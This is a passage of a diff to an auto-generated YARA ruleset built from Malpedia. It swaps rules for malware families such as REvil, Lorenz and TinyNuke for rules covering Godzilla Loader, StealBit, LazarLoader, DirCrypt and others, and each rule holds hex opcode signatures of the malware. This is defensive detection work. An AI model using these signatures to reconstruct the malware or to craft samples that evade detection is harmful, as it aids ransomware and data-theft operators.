+		$sequence_15 = { 00f1 3d46005e3e 46 00cd }
 
 	condition:
-		7 of them and filesize < 723968
+		7 of them and filesize < 1417216
 }
-rule MALPEDIA_Win_Xbot_Pos_Auto : FILE
+rule MALPEDIA_Win_Godzilla_Loader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "2a6bf949-203e-5838-9302-120351d13e42"
+		id = "9353009a-9ab6-50d2-b27c-912bbfae24ce"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.xbot_pos"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.xbot_pos_auto.yar#L1-L129"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.godzilla_loader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.godzilla_loader_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "64b7d710b96434b08fc5c38afe005807adccf502aa66b286ce03ea7fb875f890"
+		logic_hash = "15db96ce18a2f3fdeaf72974bdf0f4fdfaa545b5ea238cf268df493277052de4"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -100052,32 +100083,32 @@ rule MALPEDIA_Win_Xbot_Pos_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8945ec 837dec00 7410 8b4dec e8???????? }
-		$sequence_1 = { 50 8b4d08 e8???????? 50 8b4dec e8???????? 8b08 }
-		$sequence_2 = { e8???????? 8d8df8fcffff e8???????? 8d85d8fcffff 50 8b4d08 e8???????? }
-		$sequence_3 = { 8b4508 83e03f 6bc830 8b1495e0465600 03d1 b801000000 6bc800 }
-		$sequence_4 = { 8b4d0c c1f906 8b550c 83e23f 6bc230 8b0c8de0465600 8b55dc }
-		$sequence_5 = { e8???????? 0fb68593feffff 85c0 7431 8d4580 50 }
-		$sequence_6 = { 6bc830 8b1495e0465600 0fb6440a28 2580000000 7541 8b4de4 51 }
-		$sequence_7 = { 8d850cfdffff 50 8b4d08 e8???????? 89851cfcffff }
-		$sequence_8 = { 8945ec 837dec00 7417 8b45f8 83780800 740e 8b45ec }
-		$sequence_9 = { 00a58d49000e 8a4900 268b4900 52 8c4900 7e8d 49 }
+		$sequence_0 = { 8d45fc 50 57 6a01 56 ff7508 8975fc }
+		$sequence_1 = { 7406 8b08 50 ff511c }
+		$sequence_2 = { 57 6a01 56 ff7508 8975fc ff15???????? }
+		$sequence_3 = { 51 56 57 ff7508 ff15???????? 8bf0 56 }
+		$sequence_4 = { 50 a5 ff512c 85c0 756c }
+		$sequence_5 = { 8d45fc 50 57 6a01 56 ff7508 }
+		$sequence_6 = { 50 57 6a01 56 ff7508 }
+		$sequence_7 = { 6a01 56 ff7508 8975fc ff15???????? }
+		$sequence_8 = { 50 ff91f0000000 85c0 7813 }
+		$sequence_9 = { 50 57 6a01 56 ff7508 8975fc ff15???????? }
 
 	condition:
-		7 of them and filesize < 3031040
+		7 of them and filesize < 155648
 }
-rule MALPEDIA_Win_Revil_Auto : FILE
+rule MALPEDIA_Win_Polyvice_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "45dad52d-586b-5209-8ce9-2a48da5b7435"
+		id = "2290fade-1786-50c9-a103-500f2794f68d"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.revil"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.revil_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.polyvice"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.polyvice_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "120e5cbd30d90d4dc063fdbdb97cb211c1d8a67c5a1d2649d0974884fd7ebfbf"
+		logic_hash = "099fd1583428c4dcd9d4587ff6b2523b274374d689fdabd70b857d716538d61f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -100091,32 +100122,32 @@ rule MALPEDIA_Win_Revil_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7e09 80f92d 0f8509060000 6a03 8d45e0 50 8d45e8 }
-		$sequence_1 = { 59 8d8568ffffff 50 8d85d0feffff 8db5d0feffff 8dbd80feffff f3a5 }
-		$sequence_2 = { 83e801 eb07 b00a 5d c3 83e862 7428 }
-		$sequence_3 = { c1ca08 23d6 0bd0 8b4104 57 }
-		$sequence_4 = { 8975f0 8955f8 c745bc01000000 895db8 3b5de4 }
-		$sequence_5 = { 50 e8???????? 8b7d0c 8b4508 59 }
-		$sequence_6 = { 8975d8 0fb645ff 0bc8 8bc1 894dd8 }
-		$sequence_7 = { 334678 3386a0000000 8b4e04 334e2c 334e54 334e7c 338ea4000000 }
-		$sequence_8 = { 8bc2 318b80000000 8bcb 3345f4 3375f0 3355f4 }
-		$sequence_9 = { 55 8bec 837d0c20 7605 83c8ff }
+		$sequence_0 = { 448b7c2434 41c1ef0a 4531fe 4589e7 4131ef 4401f0 458dac0567292914 }
+		$sequence_1 = { 448d4001 4d63c0 4d01c0 488d0c4a 488b13 e8???????? 83ff01 }
+		$sequence_2 = { 488b4040 4889942498020000 48898424a0020000 488b05???????? 488b10 48899424a8020000 488b5008 }
+		$sequence_3 = { 4885c0 4889c3 743d 8928 488d0dbcf00000 48897808 ff15???????? }
+		$sequence_4 = { 488b5020 4889942430040000 488b5028 4889942438040000 488b5030 4889942440040000 }
+		$sequence_5 = { 01d6 01f1 c1cd07 41c1c40e 41c1ed03 4131ec 4531ec }
+		$sequence_6 = { 894608 49c1e820 4c01ca 4c01c2 4101fb 44891e 89560c }
+		$sequence_7 = { 488b5918 488b0b ff15???????? 4889d9 89c6 e8???????? 89f0 }
+		$sequence_8 = { 42083c18 89f7 6644898040080000 29cf 89f9 41d3f9 }
+		$sequence_9 = { 41c1cc02 c1c705 4101ff 8b7c2410 31c7 31cf d1c7 }
 
 	condition:
-		7 of them and filesize < 155794432
+		7 of them and filesize < 369664
 }
-rule MALPEDIA_Win_Oddjob_Auto : FILE
+rule MALPEDIA_Win_Dnschanger_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "32aa97fe-459e-54bb-b312-8c16abdd023e"
+		id = "375505d5-891d-554a-a42f-9e6f0fae0b87"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.oddjob"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.oddjob_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dnschanger"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.dnschanger_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "c90a8570c9226524a00ad8a64dc22040d6bcfc4b7b8994bff5525418a1842496"
+		logic_hash = "f68b87e486e08337bbca4e5fa0e18e836c7279b07c38cbb25db798c12b62c8c3"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -100130,32 +100161,32 @@ rule MALPEDIA_Win_Oddjob_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8845da 8845df 8845fa 8845fb 8b4508 6a40 052a080000 }
-		$sequence_1 = { 8b450c 85c0 74f2 8365f800 85ff 7677 8945f4 }
-		$sequence_2 = { c685c1f8ffff68 c685c2f8ffff8e c685c3f8ffff4e c685c4f8ffff0e c685c5f8ffffec 8885c6f8ffff c685c7f8ffffb5 }
-		$sequence_3 = { c68530feffffc2 c68531feffff04 889d32feffff c68533feffff83 c68534feffffc4 }
-		$sequence_4 = { e8???????? 89858494ffff 3bc3 7506 899da494ffff 6a08 }
-		$sequence_5 = { 3bcf 8955fc 7ce0 33c9 394d0c 762b }
-		$sequence_6 = { 0bc6 0fb67102 0fb64903 c1e008 33f2 0bc6 33ca }
-		$sequence_7 = { 885e1a c785b0feffff01000000 885e10 8b4dfc 8b85b0feffff 5f 33cd }
-		$sequence_8 = { 50 ff5108 3bfe 7405 }
-		$sequence_9 = { e8???????? ff75f0 d1eb 53 57 }
+		$sequence_0 = { 7411 8b4500 68???????? 50 e8???????? 83c408 8b4d00 }
+		$sequence_1 = { 8b35???????? ffd6 57 ffd6 5f 32c0 5e }
+		$sequence_2 = { 6a08 ff15???????? 50 ff15???????? 8b6c241c 8b74240c }
+		$sequence_3 = { 8844240f e8???????? 8b442414 83c40c 89442400 }
+		$sequence_4 = { 756b 8b44240c 83f804 7705 be06000000 }
+		$sequence_5 = { c3 8a44242c 84c0 742d }
+		$sequence_6 = { 6a00 6a03 ff75fc ffd7 }
+		$sequence_7 = { 83c408 84c0 7406 b801000000 }
+		$sequence_8 = { eb4e 57 33c0 8d7df8 895df4 }
+		$sequence_9 = { ff15???????? 8d542408 52 e8???????? 85c0 5f 5e }
 
 	condition:
-		7 of them and filesize < 221184
+		7 of them and filesize < 49152
 }
-rule MALPEDIA_Win_Oatboat_Auto : FILE
+rule MALPEDIA_Win_Dimnie_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c48265c6-7a9b-56ea-94f6-25b8465cba6b"
+		id = "a82e9816-e911-5906-b4fb-5ab4ee56af42"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.oatboat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.oatboat_auto.yar#L1-L109"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dimnie"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.dimnie_auto.yar#L1-L115"
 		license_url = "N/A"
-		logic_hash = "56315385a1ed981e34ba70026cf854697ce902e66d4a4a661e8df69530ad3228"
+		logic_hash = "4f084852c71be42252e84f78f5c5fbeea9af651580f68857653ee5cb5f11e6f5"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -100169,30 +100200,32 @@ rule MALPEDIA_Win_Oatboat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c745e04e744672 c745e465655669 c745e872747561 c745ec6c4d656d c745f06f727900 e8???????? }
-		$sequence_1 = { 488bf9 c745e04b004500 33db c745e452004e00 488d4de0 66895df8 c745e845004c00 }
-		$sequence_2 = { c745e46f70794d c745e8656d6f72 66c745ec7900 e8???????? 4d8bc4 }
-		$sequence_3 = { e8???????? 488bcf ffd0 488b5c2450 488b742458 488b7c2460 4883c430 }
-		$sequence_4 = { c740e86c000000 e8???????? 4885c0 740e 488bd7 488bc8 e8???????? }
-		$sequence_5 = { 4883653000 488d4de0 4c896538 c745e04e74416c c745e46c6f6361 c745e874655669 c745ec72747561 }
-		$sequence_6 = { c745f46f727900 e8???????? 4c8d4d38 c744242840000000 4533c0 }
-		$sequence_7 = { 0f84a3000000 4d8b5210 4d85d2 0f8496000000 4d397a30 0f848c000000 498b5a60 }
+		$sequence_0 = { 2b5508 83fa01 751c 0f31 }
+		$sequence_1 = { 7605 8b450c eb54 8b550c 2b5508 83fa01 751c }
+		$sequence_2 = { 8855ae eb04 c645ae3d 8b450c }
+		$sequence_3 = { 890a 8b4510 8b08 83e107 }
+		$sequence_4 = { 8b4d08 3b4d0c 7605 8b450c eb54 8b550c 2b5508 }
+		$sequence_5 = { c70101000000 8b5510 c70201000000 8b4508 8b08 }
+		$sequence_6 = { c1e804 8945f4 8b4df8 83c101 8b45f4 33d2 f7f1 }
+		$sequence_7 = { c745fc00000000 c745f800000000 c745f850000000 8b450c }
+		$sequence_8 = { 8b5510 c70201000000 8b4508 8b08 83e10f }
+		$sequence_9 = { 83c101 8b45f4 33d2 f7f1 }
 
 	condition:
-		7 of them and filesize < 58368
+		7 of them and filesize < 212992
 }
-rule MALPEDIA_Win_Ddkong_Auto : FILE
+rule MALPEDIA_Win_Beatdrop_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b5952305-5353-5501-a1a7-08eb6dbe1f60"
+		id = "ff3c4e57-abd7-50b6-b4a8-35e3251008c1"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ddkong"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ddkong_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.beatdrop"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.beatdrop_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "63fd2294d146377f9037ca4f08ce95fd06d019686efc226016c406199e6b874d"
+		logic_hash = "fb95caaadd3d9eb43e82310b2c0d02a31a3bc14c45800fa5e72d0081477812d0"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -100206,32 +100239,32 @@ rule MALPEDIA_Win_Ddkong_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 50 ffd7 ff750c 8bf0 66c745dc0200 ff55fc }
-		$sequence_1 = { 8d45f0 50 c645c44d c645c56f c645c676 c645c765 c645c846 }
-		$sequence_2 = { 8b4c3878 85c9 8b44387c 894c2410 745a 85c0 }
-		$sequence_3 = { c645b963 c645ba75 c645bb72 c645bc69 }
-		$sequence_4 = { 53 6a03 e8???????? 83c40c 6a0a }
-		$sequence_5 = { c685d1feffff75 c685d2feffff70 c685d3feffff6c c685d4feffff69 c685d5feffff63 c685d6feffff61 }
-		$sequence_6 = { ab 33c9 33c0 8d7dc4 894dc0 }
-		$sequence_7 = { 53 ff55f8 53 ff55f4 6a01 ff7508 e8???????? }
-		$sequence_8 = { c645d146 c645d269 c645d36c c645d465 c645d54e c645d661 c645d76d }
-		$sequence_9 = { 72f6 ff7604 57 ff742418 e8???????? 83c40c 395e1c }
+		$sequence_0 = { 31fa 895110 3351f4 895114 }
+		$sequence_1 = { ff15???????? 488b03 8a10 80fa02 743f }
+		$sequence_2 = { 4883e810 4883c428 5b 5e 5f 5d }
+		$sequence_3 = { 4154 4883ec48 4c8d6c2430 4989cc 4c89e9 e8???????? 4c89ea }
+		$sequence_4 = { 400fb6ff 41339cbd00040000 0fb6fd 4489d9 41339cbd00080000 413394b5000c0000 c1e810 }
+		$sequence_5 = { 4889442458 e8???????? eb0a 4889f1 e8???????? eb8d }
+		$sequence_6 = { 498344241010 eb11 498d4c2408 e8???????? eb05 49ff442418 }
+		$sequence_7 = { c3 4889c8 4c8d998c030000 4889ca 0f1f00 }
+		$sequence_8 = { 89aef8000000 44899efc000000 478b84bc00080000 898e00010000 4181e0000000ff }
+		$sequence_9 = { 4c89e9 e8???????? 4c89e0 4883c450 5b }
 
 	condition:
-		7 of them and filesize < 81920
+		7 of them and filesize < 584704
 }
-rule MALPEDIA_Win_Matsnu_Auto : FILE
+rule MALPEDIA_Win_Lazarloader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0f71c5ab-0c82-5153-bcd8-045c162f2f63"
+		id = "4eef2499-48c5-5b94-8dd0-29267a0265f8"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.matsnu"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.matsnu_auto.yar#L1-L114"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lazarloader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.lazarloader_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "95216433634cb314b9cc2cf8428b6a5d974607cd960d3ec0665086600fff0829"
+		logic_hash = "176d7f7f65178334e7677ff59a660edd6b016ed103feffa239e5ccc53e031e90"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -100245,34 +100278,34 @@ rule MALPEDIA_Win_Matsnu_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 751d ff75ba ff7510 e8???????? 8945f6 }
-		$sequence_1 = { 2945ce ebd3 c745d600000000 c745da00010000 c745e200000000 }
-		$sequence_2 = { 8b45e6 8807 eb75 817dd6000f0000 }
-		$sequence_3 = { c1e004 8b7dfa 01c7 8b45de 8907 8b45e6 c1e004 }
-		$sequence_4 = { 8b75fa 01c6 8b36 0375ea 8b7d10 }
-		$sequence_5 = { 7402 eb14 8d75f9 56 }
-		$sequence_6 = { 8b450c 8985c0fbffff 50 ff7508 }
-		$sequence_7 = { 8a4e01 80e1f0 c0e904 08c8 8d55bc 01c2 8a02 }
-		$sequence_8 = { e8???????? 83f800 750f c785a4fbffff03000000 e9???????? }
-		$sequence_9 = { 55 89e5 81ec10020000 c785f0fdffff00000000 }
+		$sequence_0 = { 48894de8 488945f0 488d15a0bd0000 b805000000 894520 894528 }
+		$sequence_1 = { 488bd7 4c8d05fecd0000 83e23f 488bcf }
+		$sequence_2 = { 33c0 b906020000 f3aa 33c0 66898424d0060000 488d8424d2060000 488bf8 }
+		$sequence_3 = { 488bc2 e9???????? 493bec 0f84be000000 8b7500 33c0 f04d0fb1bcf120ba0100 }
+		$sequence_4 = { 4889842490000000 488b442470 0fb700 6689442432 488b442458 0fb74c2432 }
+		$sequence_5 = { 4885c9 7430 53 4883ec20 488d0563810000 }
+		$sequence_6 = { eb19 488d1dec1e0100 eb10 488d1df31e0100 eb07 488d1dd21e0100 }
+		$sequence_7 = { 4883ec20 e8???????? 488b05???????? 488d1da7710100 }
+		$sequence_8 = { e8???????? 89442460 33c9 e8???????? }
+		$sequence_9 = { 85c0 750d 488bcb e8???????? e9???????? 4c8d2557230100 }
 
 	condition:
-		7 of them and filesize < 606992
+		7 of them and filesize < 364544
 }
-rule MALPEDIA_Win_Lorenz_Auto : FILE
+rule MALPEDIA_Win_Stealbit_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f6bc353c-58c5-5213-8fe7-6cfcca7b0b8a"
+		id = "64063c47-cdf5-5614-a83c-80647057336b"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lorenz"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.lorenz_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.stealbit"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.stealbit_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "1368912ce9218bae6e0caed5bc87ab7c2ec45745a55c8f3691e41777e1860427"
-		score = 60
-		quality = 45
+		logic_hash = "744b036a3f78a167f444b112707f7176ea1e1a362d653a3e610f6fa57bd7d98b"
+		score = 75
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -100284,32 +100317,32 @@ rule MALPEDIA_Win_Lorenz_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b4dfc 8b55fc 8b8100050000 2b8204050000 83f801 7515 b904000000 }
-		$sequence_1 = { 8b4df0 83c110 e9???????? 8b4df0 83c160 e9???????? 8d4de0 }
-		$sequence_2 = { 8bc8 e8???????? 0fb6c0 85c0 743b 8d4dd4 e8???????? }
-		$sequence_3 = { 8b55fc 898a20080000 8b45fc c7802c08000000000000 8b4dfc c7813008000000000000 8b55fc }
-		$sequence_4 = { f00fb10a 3d00000080 0f8588000000 8b45f0 83c01c 50 6a04 }
-		$sequence_5 = { c7402000000000 8b4d0c e8???????? 8b4dfc 894124 8b4d0c e8???????? }
-		$sequence_6 = { eb05 e8???????? e9???????? 837d14ff 0f84ac000000 8b45ec 83781400 }
-		$sequence_7 = { cc 33c0 75d0 33c9 75cc 837df820 7f0e }
-		$sequence_8 = { 8b4d08 51 e8???????? 83c410 8b55f0 83ca01 8955f0 }
-		$sequence_9 = { 8bec 83ec08 894df8 837d0800 7414 8b4508 833800 }
+		$sequence_0 = { 58 6a74 668945ea 58 6a65 668945ec 58 }
+		$sequence_1 = { e8???????? 8bcf 894508 e8???????? 8b4d08 33c8 741f }
+		$sequence_2 = { 884105 e8???????? 6a03 6a4f 884106 e8???????? }
+		$sequence_3 = { e8???????? 40 50 8b54240c }
+		$sequence_4 = { 42 83fa46 72ed 8bc6 5e c3 55 }
+		$sequence_5 = { 6a20 5e 56 884106 e8???????? 6a04 }
+		$sequence_6 = { 59 85c0 0f840d030000 57 8d9574feffff 8bce }
+		$sequence_7 = { 58 6a6f 6689856cffffff 58 6a67 6689856effffff 66898d68ffffff }
+		$sequence_8 = { e8???????? 6689421a 0fb705???????? 50 e8???????? 6689421c 0fb705???????? }
+		$sequence_9 = { e8???????? 33c0 59 40 eb07 e8???????? 33c0 }
 
 	condition:
-		7 of them and filesize < 2254848
+		7 of them and filesize < 131072
 }
-rule MALPEDIA_Win_No_Justice_Auto : FILE
+rule MALPEDIA_Win_Httpsuploader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9c76a62e-45df-5e55-95c7-3fd18c7cd11d"
+		id = "be17d448-1d90-5f75-8f13-d63b39944dc3"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.no_justice"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.no_justice_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.httpsuploader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.httpsuploader_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "27fb4d87fb503a879f5ac0f508a221856b21d7d81edc4c17f436773a20141500"
+		logic_hash = "5be7e6e5938fcb4fa9787510fb0867a1f442345e4d8453db75c177a24413afa4"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -100323,34 +100356,34 @@ rule MALPEDIA_Win_No_Justice_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b45b4 8a0a 884c382e 8b45bc 8b048570be4100 804c382d04 }
-		$sequence_1 = { 83e03f c1f906 6bc038 03048d70be4100 }
-		$sequence_2 = { 6bc938 53 56 8b048570be4100 8b7508 57 }
-		$sequence_3 = { 57 8b7d08 e9???????? 8b0f 894dfc 8d048de0c14100 }
-		$sequence_4 = { 8b04bd70be4100 807c182800 7d46 8b750c 807e1400 7507 }
-		$sequence_5 = { 8945f4 8b4514 40 c745ec0a294000 894df8 8945fc 64a100000000 }
-		$sequence_6 = { c3 8b55fc 8bc6 8d0c95e0c14100 8701 85c0 }
-		$sequence_7 = { 8d0c95e0c14100 8701 85c0 7407 56 ff15???????? }
-		$sequence_8 = { 8b048570be4100 8b4ddc f644012801 7517 8b4514 c6401c01 c7401809000000 }
-		$sequence_9 = { 8b049d70be4100 f644072801 7444 837c0718ff 743d e8???????? }
+		$sequence_0 = { 33ff 33d2 41b806020000 6689bc2470020000 e8???????? 488d4c2451 33d2 }
+		$sequence_1 = { 33d2 33c9 897c2428 48895c2420 ff15???????? eb3b 488d0dc3bd0000 }
+		$sequence_2 = { 4883ec20 488bfa 488bd9 488d0501700000 488981a0000000 83611000 }
+		$sequence_3 = { 4c8bc0 418bd4 e8???????? 488d8dd0000000 ff15???????? }
+		$sequence_4 = { 488d0d6c280000 4533c9 ba00000040 4489442420 ff15???????? }
+		$sequence_5 = { 4c8d25cf7d0000 f0ff09 7511 488b8eb8000000 493bcc }
+		$sequence_6 = { 488d0543b50000 eb04 4883c014 4883c428 c3 4053 }
+		$sequence_7 = { 488d158e380000 488bc8 ff15???????? 4885c0 0f847a010000 }
+		$sequence_8 = { 81fa01010000 7d13 4863ca 8a44191c 4288840170fa0000 }
+		$sequence_9 = { 745e 6666660f1f840000000000 488b0d???????? 488d542440 4533c9 4533c0 ff15???????? }
 
 	condition:
-		7 of them and filesize < 253952
+		7 of them and filesize < 190464
 }
-rule MALPEDIA_Win_Tinynuke_Auto : FILE
+rule MALPEDIA_Win_Dircrypt_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e047ea51-f3c4-5f88-b573-b37c1953b9b2"
+		id = "6dfaa124-348a-5731-9f6e-b3677fe125b4"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinynuke"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.tinynuke_auto.yar#L1-L291"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dircrypt"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.dircrypt_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "6f2eccbfe290f185e4b6b9493a76e1eee7c900297614878527a2340fef27067f"
+		logic_hash = "62b8e91a741487003e5f68773b4563818c6ceb487f0acf4f30c08c003042c088"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -100362,54 +100395,32 @@ rule MALPEDIA_Win_Tinynuke_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c3 55 8bec 817d0c00040000 }
-		$sequence_1 = { 59 85db 7416 57 53 6aff }
-		$sequence_2 = { 3b750c 72e5 5f 5b 5e 5d c3 }
-		$sequence_3 = { ff35???????? a3???????? ff75f4 ff15???????? ff35???????? a3???????? ff75f4 }
-		$sequence_4 = { 8d45f8 50 56 57 ff35???????? ff75fc }
-		$sequence_5 = { 8d8530f6ffff 50 6802020000 ff15???????? 85c0 }
-		$sequence_6 = { 83c418 a3???????? 5f 5e 5b c9 c3 }
-		$sequence_7 = { 8945f4 8d85d4feffff 50 ff15???????? }
-		$sequence_8 = { ff75ec ff75fc e8???????? 83c40c 5f }
-		$sequence_9 = { ff35???????? 8d85a4feffff 50 ff15???????? ff35???????? 8d85a4feffff 50 }
-		$sequence_10 = { ff15???????? ff35???????? 8d85a8feffff 50 }
-		$sequence_11 = { c70604000000 e8???????? eb18 83f803 }
-		$sequence_12 = { ff15???????? a3???????? ff35???????? ff75f8 ff15???????? }
-		$sequence_13 = { a3???????? 68e2010000 68???????? 68???????? }
-		$sequence_14 = { eb18 83f803 7519 ff7608 }
-		$sequence_15 = { 3c0a 7409 3c0d 740f }
-		$sequence_16 = { 8b02 8a00 3c0a 7409 }
-		$sequence_17 = { 6a2a 50 8945fc ff15???????? }
-		$sequence_18 = { a3???????? ff35???????? ff75ec ff15???????? }
-		$sequence_19 = { 50 8d85d8feffff 50 ff15???????? ff35???????? }
-		$sequence_20 = { 8d85f0fdffff 50 ff15???????? ff75fc 8d85f0fdffff 50 e8???????? }
-		$sequence_21 = { 8d85f0fdffff 50 e8???????? 59 50 68???????? }
-		$sequence_22 = { ff15???????? 8b35???????? 8d430c 50 }
-		$sequence_23 = { 8b1d???????? 83fbff 7424 85db 740f ff149dc01de06e 83eb01 }
-		$sequence_24 = { eb10 8d04cd00000000 2bc1 8d0c45386d0210 }
-		$sequence_25 = { 85c0 75b7 8b7c241c 8b8780000000 }
-		$sequence_26 = { 89442404 e8???????? 83ec10 8b44241c }
-		$sequence_27 = { 83ec08 85c0 75d6 31db }
-		$sequence_28 = { 01d8 89442418 8b400c 85c0 745c 01d8 890424 }
-		$sequence_29 = { 81c2???????? 89542404 890c24 e8???????? }
-		$sequence_30 = { ff149dc01de06e 83eb01 8d7600 75f1 c70424???????? }
-		$sequence_31 = { e8???????? 83ec04 3c0c 7421 ffd3 }
+		$sequence_0 = { e8???????? 6a01 6a10 ff15???????? 50 }
+		$sequence_1 = { e8???????? e8???????? e8???????? 68???????? ff15???????? 833d????????00 751a }
+		$sequence_2 = { 51 6a00 6a00 8d45fc 50 68???????? 6802000080 }
+		$sequence_3 = { 51 ff15???????? 8945fc 8b450c 2b4508 }
+		$sequence_4 = { 833d????????00 7528 c705????????01000000 e8???????? e8???????? }
+		$sequence_5 = { 68???????? e8???????? 05d2070000 50 }
+		$sequence_6 = { 51 ff15???????? 8945fc 8b450c 2b4508 50 }
+		$sequence_7 = { 833d????????00 751e c705????????01000000 e8???????? e8???????? e8???????? }
